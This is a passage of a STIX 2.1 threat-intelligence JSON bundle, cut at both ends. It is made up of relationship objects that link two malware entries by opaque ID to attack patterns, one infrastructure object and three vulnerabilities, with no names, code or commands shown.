"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--72adb26f-6cdd-5231-b02a-830b39aecee9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943596Z", "modified": "2026-06-16T16:01:05.943596Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a8cf0631-cdad-5eec-bc3c-81cd2432675f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943709Z", "modified": "2026-06-16T16:01:05.943709Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--060a2d2d-bfae-5dd8-af93-9bdf41038bfa", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943806Z", "modified": "2026-06-16T16:01:05.943806Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--90c68280-9d95-5dab-9fdd-d37ef5d4020a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943901Z", "modified": "2026-06-16T16:01:05.943901Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--373e08e1-ae4d-5e61-b977-2c8a9026793b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.943995Z", "modified": "2026-06-16T16:01:05.943995Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--552a7143-fb67-55d1-a169-e97c90b99ea1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944098Z", "modified": "2026-06-16T16:01:05.944098Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--052ca297-a53c-568a-a27c-1ca3efd318d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944195Z", "modified": "2026-06-16T16:01:05.944195Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c532716f-c999-5b8e-9039-9560fc670bc2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94429Z", "modified": "2026-06-16T16:01:05.94429Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f5a58a68-f960-5ee6-8532-5578456e02f6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944384Z", "modified": "2026-06-16T16:01:05.944384Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b6a50337-4c68-5719-bc05-e65194677d36", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944478Z", "modified": "2026-06-16T16:01:05.944478Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7920274a-8ea5-575c-b3fc-60dca3ca493d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944572Z", "modified": "2026-06-16T16:01:05.944572Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7b4f49a8-14ee-59a2-ab5d-3bf3de461bd5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944666Z", "modified": "2026-06-16T16:01:05.944666Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--581771e2-ca24-5086-bc0b-4915f8d4085e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94476Z", "modified": "2026-06-16T16:01:05.94476Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c38d35c2-750e-5ed7-9a0e-6cc1bfae801b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944855Z", "modified": "2026-06-16T16:01:05.944855Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1c443b74-d57a-5a77-a7c6-1f9e941af923", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.944949Z", "modified": "2026-06-16T16:01:05.944949Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9f1104f8-a442-57c0-b7e6-f60cce684046", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945043Z", "modified": "2026-06-16T16:01:05.945043Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4b22d609-6dc4-5593-a0b2-6f13a85bea69", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945143Z", "modified": "2026-06-16T16:01:05.945143Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--5cc3066b-d353-550b-9727-8bbce0e5fc9f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945238Z", "modified": "2026-06-16T16:01:05.945238Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--634a9bf2-1378-5e2f-86a7-421d42d5961a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945332Z", "modified": "2026-06-16T16:01:05.945332Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--61d5c05d-1834-5228-8459-6356d14fa948", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945427Z", "modified": "2026-06-16T16:01:05.945427Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--36125cd0-9444-55d7-9fc4-078787d29d06", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945522Z", "modified": "2026-06-16T16:01:05.945522Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2e81034a-84be-5203-8905-4a48bf28ff08", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945617Z", "modified": "2026-06-16T16:01:05.945617Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0a7c7c86-9294-5299-a5d9-1e757b77306b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945712Z", "modified": "2026-06-16T16:01:05.945712Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ce53e38a-6de1-5d99-83eb-e19a53dc10b3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945807Z", "modified": "2026-06-16T16:01:05.945807Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--232b546a-a0ae-5d57-98f0-827c5fbb92d4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945901Z", "modified": "2026-06-16T16:01:05.945901Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--711d0425-5df5-53fd-b00c-419590222097", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.945996Z", "modified": "2026-06-16T16:01:05.945996Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2c4f5eb6-710f-5d41-aab7-bac48f50faac", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946096Z", "modified": "2026-06-16T16:01:05.946096Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--22a3b611-2349-5aaf-a6d9-b42ccd905b62", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946194Z", "modified": "2026-06-16T16:01:05.946194Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c36e2901-2907-53c9-9a96-bf3819fa9b3f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946289Z", "modified": "2026-06-16T16:01:05.946289Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f4dce50a-d1d9-5841-ba14-f0cfbdfd1aaf", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946384Z", "modified": "2026-06-16T16:01:05.946384Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7f780239-4075-5415-9d7f-ca2dee33d7b9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946479Z", "modified": "2026-06-16T16:01:05.946479Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e04b5694-75e1-5fad-8db6-b11ff1b5f0e2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946576Z", "modified": "2026-06-16T16:01:05.946576Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cbc48bed-2ff0-50ab-8c2a-812d0b7a5ffd", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946671Z", "modified": "2026-06-16T16:01:05.946671Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--92ba2964-4c11-5cbe-b8ce-cecfa224f7b4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946765Z", "modified": "2026-06-16T16:01:05.946765Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7803945b-b814-594a-8d32-68d0ccb0db63", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94686Z", "modified": "2026-06-16T16:01:05.94686Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ecf6b783-7cd4-51fa-bb23-330b0ae51183", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.946955Z", "modified": "2026-06-16T16:01:05.946955Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6fa79902-5287-5689-9944-55fd470c0f34", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94705Z", "modified": "2026-06-16T16:01:05.94705Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ed4ecb8d-b959-58a9-894f-43e835cbd0f7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94715Z", "modified": "2026-06-16T16:01:05.94715Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--17de8a5f-7698-52dd-a8a2-55516cf867ec", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947246Z", "modified": "2026-06-16T16:01:05.947246Z", "relationship_type": "uses", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--670dbe0f-35f7-54a8-a975-a99dec256d97", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947342Z", "modified": "2026-06-16T16:01:05.947342Z", "relationship_type": "communicates-with", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--03ad32bb-fc33-5264-8734-f9c2dd144128", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947437Z", "modified": "2026-06-16T16:01:05.947437Z", "relationship_type": "exploits", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--afb15445-9bc9-5f6c-8f39-6418bc8ed435", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947531Z", "modified": "2026-06-16T16:01:05.947531Z", "relationship_type": "exploits", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--18cb0255-d49c-521b-a7f8-19415d6937b3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947625Z", "modified": "2026-06-16T16:01:05.947625Z", "relationship_type": "exploits", "source_ref": "malware--477a91e9-2103-5dbc-bbe0-2fa80ffa8e2a", "target_ref": "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7f70ad3c-b2da-51f3-9adf-de104f8c3d88", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.94772Z", "modified": "2026-06-16T16:01:05.94772Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--38d0f634-3175-53aa-b70f-b7dd5233a222", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947815Z", "modified": "2026-06-16T16:01:05.947815Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--73af3284-2d62-5316-90c4-ff50ee0d003a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.947909Z", "modified": "2026-06-16T16:01:05.947909Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7f409026-05fa-5416-b3b0-2a85f91f70b9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948004Z", "modified": "2026-06-16T16:01:05.948004Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b7bdd70a-afcb-5772-aef6-9db446c676d5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948122Z", "modified": "2026-06-16T16:01:05.948122Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bcab102a-0789-5a33-98e5-61431e22fb73", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948266Z", "modified": "2026-06-16T16:01:05.948266Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--fe4c1631-bf19-5cdf-9e5e-d79d170ac7c1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948406Z", "modified": "2026-06-16T16:01:05.948406Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ca2182dc-8bcd-569b-9762-d2818c3fbe88", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948541Z", "modified": "2026-06-16T16:01:05.948541Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--bd153ee3-ccc9-5e98-92d8-5e0da024b818", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948683Z", "modified": "2026-06-16T16:01:05.948683Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e8b08db8-e676-5006-b060-4fdb32f54b04", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.948798Z", "modified": "2026-06-16T16:01:05.948798Z", "relationship_type": "uses", "source_ref": "malware--d1d9e880-58ea-519d-8600-2707e5a94f70", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--96fe2f47-01cd-5b94-b0fe-12c8bf231214", 